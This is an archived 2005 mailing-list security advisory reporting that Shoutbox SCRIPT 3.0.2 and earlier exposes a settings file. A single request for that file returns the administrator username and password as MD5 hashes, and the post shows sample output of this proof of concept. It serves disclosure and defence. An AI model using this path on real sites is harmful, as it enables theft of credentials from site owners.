lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue Apr 19 22:16:28 2005
From: corryl at sitoverde.com (CorryL)
Subject: Shoutbox SCRIPT <= 3.0.2 Administrative MD5
	Username and Password Retrieval

-=[--------------------ADVISORY-------------------]=-
-=[                                                                         
     ]=-
-=[             Shoutbox SCRIPT <= 3.0.2                      ]=-
-=[                                                                         
     ]=-
-=[  Author: CorryL                  www.x0n3-h4ck.org   ]=-
-=[                                                                         
     ]=-
-=[----------------------------------------------------]=-


-=[+] Application:    Shoutbox SCRIPT
-=[+] Version:        3.0.2 and prior
-=[+] Vendor's URL:   http://www.knusperleicht.at
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Administrative MD5 Username and Password Retrieval
-=[+] Exploitation:   Remote/Local
-=[-]
-=[+] Author:         CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:      www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck


..::[ Descriprion ]::..

shoutbox and' a script very simple php to be used that to install,
and' used as a glass showcase where the consumers can leave his/her own
messages

..::[ Bug ]::..

this software and' affection from a bug,
a remote attacker exploiting the possibility
has him/it' to draw sensitive information as user and administrator pass in
md5.


..::[ Proof Of Concept ]::..

http://host/patch to shout/db/settings.dat

result:

.....
....
....
$SB_ADMIN[Change_Username] = '189bbbb00c5f1fb7fba9ad9285f193d1';
$SB_ADMIN[Change_Userpass] = '81dc9bdb52d04dc20036dbd8313ed055';



..::[ Workaround ]::..

noting


..::[ Disclousure Timeline ]::..

[17/04/2005] - Vendor notification
[19/04/2005] - No patch relase from vendor
[19/04/2005] - Public disclousure

CorryL
corryl80@...il.com
www.x0n3-h4ck.org
Italian Security Team
Fax (+39) 02700520894
Tel (+39) 06452215277
irc.xoned.net #x0n3-h4ck

_________________________________
www.seekstat.it is your web stat

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ